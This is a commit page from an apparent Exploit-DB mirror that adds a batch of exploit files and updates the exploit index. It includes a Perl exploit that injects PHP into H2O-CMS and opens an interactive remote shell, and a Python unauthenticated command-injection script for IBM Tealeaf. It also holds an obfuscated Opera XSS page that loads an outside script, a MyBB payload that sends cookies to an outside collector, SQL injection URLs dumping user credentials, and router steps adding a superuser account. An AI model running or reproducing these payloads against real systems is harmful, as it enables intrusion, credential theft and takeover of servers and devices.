bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 03_28_2014

Browse source
This commit is contained in:
Offensive Security 2014-03-28 04:32:23 +00:00
parent ee58fa916e
commit b4268e8a98
28 changed files with 487 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

29
files.csv
View file

@ -15269,7 +15269,7 @@ id,file,description,date,author,platform,type,port
17597,platforms/php/webapps/17597.txt,"SiteGenius Blind SQL injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - (.pls) Buffer Overflow Vulnerability (DEP BYPASS)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0
17601,platforms/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server DoS",2011-08-03,"Craig Freyman",windows,dos,0
17602,platforms/php/webapps/17602.txt,"WordPress TimThumb Plugin - Remote Code Execution",2011-08-03,MaXe,php,webapps,0
17602,platforms/php/webapps/17602.txt,"WordPress TimThumb Plugin 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps,0
17603,platforms/php/webapps/17603.txt,"Joomla Component (com_jdirectory) SQL Injection Vulnerability",2011-08-03,"Caddy Dz",php,webapps,0
17604,platforms/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Buffer Overflow Exploit (MSF)",2011-08-04,"James Fitts",windows,local,0
17605,platforms/windows/local/17605.rb,"ABBS Electronic Flashcards 2.1 - Buffer Overflow Exploit (MSF)",2011-08-04,"James Fitts",windows,local,0
@ -29291,3 +29291,30 @@ id,file,description,date,author,platform,type,port
32526,platforms/php/webapps/32526.txt,"ClipShare Pro 4.0 'fullscreen.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0
32527,platforms/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 'html-tidy-logic.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0
32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 'pg' Parameter Cross-Site Scripting Vulnerability",2008-10-24,"Ghost Hacker",php,webapps,0
32529,platforms/multiple/remote/32529.java,"Sun Java Web Start 1.0/1.2 Remote Command Execution Vulnerability",2008-10-25,"Varun Srivastava",multiple,remote,0
32530,platforms/linux/remote/32530.txt,"Lynx 2.8 '.mailcap' and '.mime.type' Files Local Code Execution Vulnerability",2008-11-03,"Piotr Engelking",linux,remote,0
32531,platforms/php/webapps/32531.txt,"phpMyAdmin <= 3.0.1 'pmd_pdf.php' Cross Site Scripting Vulnerability",2008-10-27,"Hadi Kiamarsi",php,webapps,0
32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 'include/common.php' Remote File Include Vulnerability",2008-10-27,Cru3l.b0y,php,webapps,0
32533,platforms/php/webapps/32533.txt,"Tandis CMS 2.5 'index.php' Multiple SQL Injection Vulnerabilities",2008-10-27,G4N0K,php,webapps,0
32534,platforms/unix/dos/32534.py,"Python <= 2.5.2 'Imageop' Module Argument Validation Buffer Overflow Vulnerability",2008-10-27,"Chris Evans",unix,dos,0
32535,platforms/php/webapps/32535.txt,"MyBB 1.4.2 'moderation.php' Cross-Site Scripting Vulnerability",2008-10-27,Kellanved,php,webapps,0
32536,platforms/php/webapps/32536.txt,"bcoos 1.0.13 'modules/banners/click.php' SQL Injection Vulnerability",2008-10-27,DeltahackingTEAM,php,webapps,0
32537,platforms/php/webapps/32537.txt,"All In One 1.4 Control Panel 'cp_polls_results.php' SQL Injection Vulnerability",2008-10-27,ExSploiters,php,webapps,0
32538,platforms/php/webapps/32538.txt,"PHP-Nuke Nuke League Module 'tid' Parameter Cross-Site Scripting Vulnerability",2008-10-28,Ehsan_Hp200,php,webapps,0
32539,platforms/php/webapps/32539.html,"Microsoft Internet Explorer 6.0 '&NBSP;' Address Bar URI Spoofing Vulnerability",2008-10-27,"Amit Klein",php,webapps,0
32540,platforms/php/webapps/32540.pl,"H2O-CMS 3.4 PHP Code Injection and Cookie Authentication Bypass Vulnerabilities",2008-10-28,StAkeR,php,webapps,0
32541,platforms/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 'id' SQL Injection Vulnerability",2008-10-28,d3v1l,php,webapps,0
32542,platforms/php/webapps/32542.txt,"Elkagroup Image Gallery 1.0 'view.php' SQL Injection Vulnerability",2008-10-28,G4N0K,php,webapps,0
32543,platforms/php/webapps/32543.txt,"KKE Info Media Kmita Catalogue 2 'search.php' Cross Site Scripting Vulnerability",2008-10-28,cize0f,php,webapps,0
32544,platforms/php/webapps/32544.txt,"KKE Info Media Kmita Gallery Multiple Cross-Site Scripting Vulnerabilities",2008-10-29,cize0f,php,webapps,0
32545,platforms/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Webshell",2014-03-26,"Groundworks Technologies",hardware,webapps,80
32546,platforms/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,php,webapps,0
32547,platforms/php/webapps/32547.txt,"Extrakt Framework 0.7 'index.php' Cross Site Scripting Vulnerability",2008-10-29,ShockShadow,php,webapps,0
32548,platforms/linux/remote/32548.html,"Opera Web Browser 9.x History Search and Links Panel Cross Site Scripting Vulnerabilities",2008-10-30,"Stefano Di Paola",linux,remote,0
32549,platforms/asp/webapps/32549.txt,"Dorsa CMS 'Default_.aspx' Cross Site Scripting Vulnerability",2008-10-29,Pouya_Server,asp,webapps,0
32550,platforms/windows/dos/32550.html,"Microsoft DebugDiag 1.0 'CrashHangExt.dll' ActiveX Control Remote Denial of Service Vulnerability",2008-10-30,suN8Hclf,windows,dos,0
32551,platforms/linux/dos/32551.txt,"Dovecot 1.1.x Invalid Message Address Parsing Denial of Service Vulnerability",2008-10-30,anonymous,linux,dos,0
32552,platforms/hardware/remote/32552.txt,"SonicWALL Content Filtering Blocked Site Error Page Cross-Site Scripting Vulnerability",2008-10-30,pagvac,hardware,remote,0
32553,platforms/php/webapps/32553.txt,"phpWebSite <= 0.9.3 'links.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
32554,platforms/php/webapps/32554.txt,"SpitFire Photo Pro 'pages.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 History Search Input Validation Vulnerability",2008-10-31,NeoCoderz,windows,remote,0

Can't render this file because it is too large.

7
platforms/asp/webapps/32549.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31992/info
Dorsa CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/Default_.aspx?lang=1&sub=5&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E

9
platforms/hardware/remote/32552.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31998/info
SonicWALL Content Filtering is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input when displaying URI address data in a blocked-site error page.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of an arbitrary site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to SonicWALL Content Filtering on SonicOS Enhanced 4.0.1.1 are vulnerable.
http://www.example.com/fuck<script>alert(document.cookie</script>

87
platforms/hardware/webapps/32545.txt Executable file
View file

@ -0,0 +1,87 @@
*Title:*
Allied Telesis AT-RG634A ADSL Broadband router hidden administrative
unauthenticated webshell.
*Vulnerability Information:*
- CVE: CVE-2014-1982
- Type of Vulnerability:
- CWE-78 : OS Command Injection
- CWE-306 : Missing Authentication for Critical Function
*Affected products:*
- Allied Telesis AT-RG634A ADSL Broadband router. (version 3.3+ and
probably others)
Other products like,
- Allied Telesis iMG624A (firmware version, 3.5)
- Allied Telesis iMG616LH (firmware version, +2.4)
- Allied Telesis iMG646BD (firmware version, 3.5)
*Vendor:*
- Allied Telesis : http://www.alliedtelesis.com//
has the same vulnerbility, but the vendor reports that the version
3.8.05 of the firmware has already addressed this issue, but we where
unable to test nor confirm this information.
*Security Patches / Workaround:*
- Allied Telesis has noted that the AT-RG634A product is no longer
supported, but gives a workaround
to mitigate the issue.
Configure the device so that only trusted devices can
access the target device using the following command,
"WEBSERVER SET MANAGEMENTIP <ip-address>"
*Short Description:*
The Allied Telesis AT-RG634A ADSL Broadband router has a hidden url
page in their admnistrative HTTP interface capable of executing
commands as admin without requiring any kind of authentication.
*Description:*
"The AT-RG634 is a full-featured, broadband media gateway and router
designed for cost-effective delivery of advanced IP Triple Play voice,
video and data services over an ADSL infrastructure. The RG634
supports Layer 3 functions, including NAT, DMZ, and Stateful
inspection firewall for delivery of revenue-generating services such
as home networking and security services." (from
www.alliedtelesis.com/p-2345.html)
The Allied Telesis AT-RG634A ADSL Broadband router has a hidden URL
(/cli.html) page to execute CLI command with admin priviledges,
available by default and without any kind of authentication.
Having as impact a total compromise of the target device.
*Steps to reproduce:*
- Connect via HTTP to the hidden page http://<device IP>/cli.html a
input box is shown, every command typed there will be executed as admin.
Entering the following lines in the hidden page (/cli.html) a new
telnet admin user called "eviluser" is added to the system.
>> system add login eviluser system set user eviluser access
>> superuser.
*Credits:*
This security issue was discovered and researched by Sebastian Muniz
(topo), Security Researcher of Groundworks Technologies
(http://www.groundworkstech.com)
*License:*
The contents of this advisory are copyright (c) 2014 Groundworks
Technologies,and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13
platforms/linux/dos/32551.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/31997/info
Dovecot is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted email headers.
An attacker can exploit this issue to prevent recipients from accessing their mailboxes.
For an exploit to succeed, the IMAP client connecting to Dovecot must use the FETCH ENVELOPE command.
The issue affects Dovecot 1.1.4 and 1.1.5.
The following invalid message address header is sufficient to trigger this issue:
"From: ("

14
platforms/linux/remote/32530.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/31917/info
Lynx is prone to a local code-execution vulnerability.
Successful exploits may allow attackers to execute arbitrary code within the context of the user running the affected application.
Versions prior to Lynx 2.8.6rel.4 are affected.
.mime.types:
application/x-bug bug
.mailcap:
application/x-bug; xmessage 'Hello, World!'

11
platforms/linux/remote/32548.html Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31991/info
Opera Web Browser is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, change the browser's settings, and launch other attacks.
Versions prior to Opera Web Browser 9.62 are vulnerable.
NOTE: The 'History Search' issue described here may be related to the 'History Search' issue that was previously described in BID 31842 'Opera Web Browser Multiple Cross Site Scripting Vulnerabilities'.
<!-- --Aviv. http://aviv.raffon.net/2008/10/30/AdifferentOpera.aspx --> <html> <script> function x() { window.open('opera:historysearch?q=%2A"><img src=\'x\' onerror=\'eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="x()">Click me...</a> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'> </body> </html> # milw0rm.com [2008-10-30]

13
platforms/multiple/remote/32529.java Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/31916/info
Sun Java Web Start is prone to a remote command-execution vulnerability.
Successful exploits may allow attackers to execute arbitrary commands on an unsuspecting user's computer. This may aid in further attacks.
We don't know which versions of Java Web Start are affected. We will update this BID when more information is released.
BasicService basicService = (BasicService) ServiceManager.lookup("javax.jnlp.BasicService");
URL mike = new URL("file:\\C:\\music.rm");
basicService.showDocument(mike);

7
platforms/php/webapps/32531.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31928/info
phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/pmd_pdf.php?db=>"><script>alert('Hadi-Kiamarsi')</script>

9
platforms/php/webapps/32532.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31929/info
The 'bcoos' program is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
This issue affects 'bcoos' 1.0.13; other versions may also be affected.
http://www.example.com/include/common.php?XOOPS_ROOT_PATH=shell

11
platforms/php/webapps/32533.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31930/info
Tandis CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Tandis CMS 2.5.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users
http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--

9
platforms/php/webapps/32535.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31935/info
MyBB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
MyBB 1.4.2 is vulnerable; other versions may also be affected.
http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url='%2Balert('XSS!')// http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%20%2B%27http://www.example2.com/cookiejar.php?c=%27%2Bdocument.cookie// http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%2Beval(%22u%3D%27application%2Fx-www-%27%2B%20%27form-urlencoded%27%22%2B%20String.fromCharCode(59)%20%2B%22c%3D%27Content-type%27%22%2B%20String.fromCharCode(59)%20%2B%22d%3D%27Content-length%27%22%2B%20String.fromCharCode(59)%20%2B%22reg%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22reg.open(%27GET%27%2C%20%27http%3A%2F%2Fwww.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%2C%20false)%22%2B%20String.fromCharCode(59)%20%2B%22reg.send(null)%22%2B%20String.fromCharCode(59)%20%2B%22r%3Dreg.responseText%22%2B%20String.fromCharCode(59)%20%2B%22t%3D%27http%3A%2F%2Fwww.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%22%2B%20String.fromCharCode(59)%20%2B%22t2%3D%27%26replacement%3D%241%26active%3D1%26my_post%22%20%20%20%20%2B%22_key%3D%27%2Br.substr(r.indexOf(%27my_post_%22%20%2B%22key%27%2B%20%27%27) %2B15%2C32)%22%2F*%20%20%20%20%20%20*%2F%2B%22%20%2B%27%26title%3DPwned%26description%27%2B%20%27%3Dfoo%26regex%3D%22%20%20%20%20%20%20%20%2B%22evil(.*)evil%2523e%2500test%27%22%2B%20String.fromCharCode(59)%20%2B%22r2%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22r2.open(%27POST%27%2Ct%2Cfalse)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(d%2Ct2.length)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(c%2Cu)%22%2B%20String.fromCharCode(59)%20%2B%22r2.sendAsBinary(t2)%22%2B%20String.fromCharCode(59))//

9
platforms/php/webapps/32536.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31941/info
The 'bcoos' program is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects bcoos 1.0.13; other versions may also be affected.
http://www.example.com/[p4th]/modules/banners/click.php?bid=-1' union+select+pass+from+bcoos_users+limit 1,0/*

9
platforms/php/webapps/32537.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31949/info
All In One Control Panel (AIOCP) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AIOCP 1.4 is vulnerable; other versions may also be affected.
http://www.example.com/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--

7
platforms/php/webapps/32538.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31952/info
PHP-Nuke Nuke League module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/modules.php?name=League&file=index&op=team&tid=[XSS]

9
platforms/php/webapps/32539.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31960/info
Internet Explorer is affected by a URI-spoofing vulnerability because it fails to adequately handle specific combinations of the non-breaking space character ('&NBSP;').
An attacker may leverage this issue to spoof the source URI of a site presented to an unsuspecting user. This may lead to a false sense of trust because the user may be presented with a source URI of a trusted site while interacting with the attacker's malicious site.
Internet Explorer 6 is affected by this issue.
<a href="http://www.example.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n <http://www.example.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n/> bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;& nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n bsp;&nbsp;.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;.phish.site/">Example</a> (In words, this is <a href="http://www.example.com <http://www.example.com/> followed by 30 ampersand-NBSP-semicolon, followed by a dot followed by another 31 ampersand-NBSP-semicolon followed by a dot, followed by 13 ampersand-NBSP-semicolon followed by a dot followed by phish.site/">Example</a>) This causes a link whose URL appears, IN THE ADDRESS BAR, as (may wrap around): http://www.example.com . . .phish.site/ (In words, this appears like "http://www.example.com" <http://www.example.com%22/> ; followed by 30 spaces, a dot, 31 spaces, a dot, 13 spaces, a dot and finally "phish.site/")

79
platforms/php/webapps/32540.pl Executable file
View file

@ -0,0 +1,79 @@
source: http://www.securityfocus.com/bid/31961/info
H2O-CMS is prone to a PHP code-injection vulnerability and a cookie authentication-bypass vulnerability.
An attacker can exploit the PHP code-injection issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Attackers can exploit the cookie authentication-bypass vulnerability to gain administrative access; this may aid in further attacks.
Versions up to and including H2O-CMS 3.4 are vulnerable.
#!/usr/bin/perl
# ----------------------------------------------------------
# H2O-CMS <= 3.4 Remote Command Execution Exploit (mq = Off)
# Discovered By StAkeR[at]hotmail[dot]it
# Download On http://sourceforge.net/projects/h2o-cms
# ----------------------------------------------------------
use strict;
use LWP::UserAgent;
use LWP::Simple;
my $post;
my $sysc;
my $host = shift or athos();
my $auth = "user=admin&id=1&admin=1";
my $http = new LWP::UserAgent;
my $write = {
'site_title' => '";""; error_reporting(0); echo"//athos"; "',
'db_server' => '";""; include($_REQUEST["i"]); "',
'db_name' => '";""; eval($_REQUEST["g"]); "',
'db_username' => '";""; echo shell_exec($_REQUEST["c"]); "',
'db_password' => '";""; echo system($_REQUEST["s"]); "',
'save' => 'Save',
};
$http->default_header('Cookie' => $auth);
$post = $http->post($host.'/index.php?option=SaveConfig',$write);
sub start_exec
{
my $site = shift @_;
my $exec = shift @_;
my $view = get($site.'/includes/config.php?c='.$exec);
return $view;
}
sub athos
{
print STDOUT "# Usage: perl $0 http://[host]\n";
print STDOUT "# Remote Command Execution Exploit\n";
exit;
}
unless(get($host) =~ /\/\/athos/i)
{
print STDOUT "# Exploit Failed!\n";
exit;
}
else
{
while(1)
{
if(defined start_exec($host,$sysc))
{
print STDOUT "[athos-shell] ~# ";
chomp($sysc = <STDIN>);
print STDOUT "[athos-shell] ~# ".start_exec($host,$sysc)."\n";
}
}
}
__END__

9
platforms/php/webapps/32541.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31963/info
H&H Solutions WebSoccer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
H&H Solutions WebSoccer 2.80 is vulnerable; other versions may also be affected.
http://www.example.com/liga.php?id=1'UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5/*

9
platforms/php/webapps/32542.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31966/info
Elkagroup is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects Elkagroup 1.0; other versions may also be affected.
http://www.example.com/view.php?cid=-33%20UNION%20ALL%20SELECT%200,user(),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--&uid=0&new=0

9
platforms/php/webapps/32543.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31968/info
Kmita Catalogue is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Kmita Catalogue V2 is vulnerable; other versions may also be affected.
http://www.example.com/search.php?q=<script>alert(document.cookie);</script>&Search=Search

9
platforms/php/webapps/32544.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31970/info
Kmita Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/kmitag/index.php?begin=10<script>alert(document.cookie);</script>&catid=3
http://www.example.com/kmitag/search.php?searchtext=<script>alert(document.cookie);</script>&Search=Search

63
platforms/php/webapps/32546.py Executable file
View file

@ -0,0 +1,63 @@
# IBM Tealeaf CX (v8 release 8) Remote OS Command Injection
# Date: 11/08/2013
# Exploit author: drone
# More information: http://www-01.ibm.com/support/docview.wss?uid=swg21667630
# Vendor homepage: http://www-01.ibm.com/software/info/tealeaf/
# Version: Version 8 Release 8 (likely all versions prior)
# Tested on: Redhat Linux 6.2
# CVE: CVE-2013-6719 / CVE-2013-6720
import requests
from argparse import ArgumentParser
""" Remote OS command injection (no auth)
IBM TeaLeaf Version 8 Release 8
drone (@dronesec)
Bonus:
LFI at /download.php?log=../../etc/passwd
"""
def run(options):
access = "http://{0}:{1}/delivery.php".format(options.address, options.port)
data = {"perform_action" : "testconn",
"delete_id" : "",
"testconn_host" : "8.8.8.8 -c 1 ; {0} ; ping 8.8.8.8 -c 1".format(options.cmd),
"testconn_port" : 1966,
"testconn_t" : "false",
"csrf" : "afe2fce60e94a235511a7397ec5c9a87fb7fc25b", # it doesnt even care
"delivery_mode" : 0,
"batch_interval" : 60,
"polling_interval" : 10,
"watchdog_timer" : 30,
"max_queue_depth" : 50000000,
"timesource_host" : "test",
"timesource_port" : 1966,
"staticshit_enabled" : "on", # seriously
"staticshit_host" : "test",
"staticshit_intervalseconds" : 60,
"staticshit_port" : 1966
}
response = requests.post(access, data=data, timeout=20.0)
if response.status_code == 200:
# lazy parsing
result = response.content.split("alert('")[1].split('onUnload')[0]
for x in result.split("\\n"):
if 'PATTERN' in x: break
print x
def parse_args():
parser = ArgumentParser()
parser.add_argument("-i", help="Server address", action="store",
required=True, dest="address")
parser.add_argument("-p", help='Server port', action='store',
dest='port', default=8080)
parser.add_argument("-c", help='Command to exec', action='store',
dest='cmd', default='whoami')
return parser.parse_args()
if __name__ == "__main__":
run(parse_args())

10
platforms/php/webapps/32547.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/31971/info
Extrakt Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize
user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Extrakt Framework 0.7 is vulnerable; other versions may also be affected.
http://www.example.com/[SCRIPT_DIR]/index.php?plugins[file][id]=<script>alert(2008);</script>

11
platforms/php/webapps/32553.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/32011/info
phpWebSite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
We don't know which versions of phpWebSite are affected. We will update this BID as more information emerges.
NOTE: The vendor refutes this issue, stating that the vulnerable script has not been present in the application since either the 0.8.x or 0.9.x releases.
http://www.example.com/links.php?op=viewlink&cid=5+and+1=2+union+select+concat(version(),0x3a,database(),0x3a,user())--

7
platforms/php/webapps/32554.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/32012/info
SpitFire Photo Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/sapientphoto/pages.php?pageId=6634+and+1=2+union+select+1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user())--

11
platforms/unix/dos/32534.py Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31932/info
Python's 'imageop' module is prone to a buffer-overflow vulnerability.
Successful exploits may allow attackers to execute arbitrary code in the context of applications using the vulnerable Python modules. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition.
These issues affect versions prior to Python 2.5.2-r6.
import imageop
s = ''
imageop.crop(s, 1, 65536, 65536, 0, 0, 65536, 65536)

9
platforms/windows/dos/32550.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31996/info
Microsoft DebugDiag 'CrashHangExt.dll' ActiveX control is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.
A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users.
Microsoft DebugDiag 1.0 is vulnerable; other versions may also be affected.
<body> <object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' /> </object> <script language='vbscript'> arg1=-2147483647 target.GetEntryPointForThread arg1 </script> </body>

9
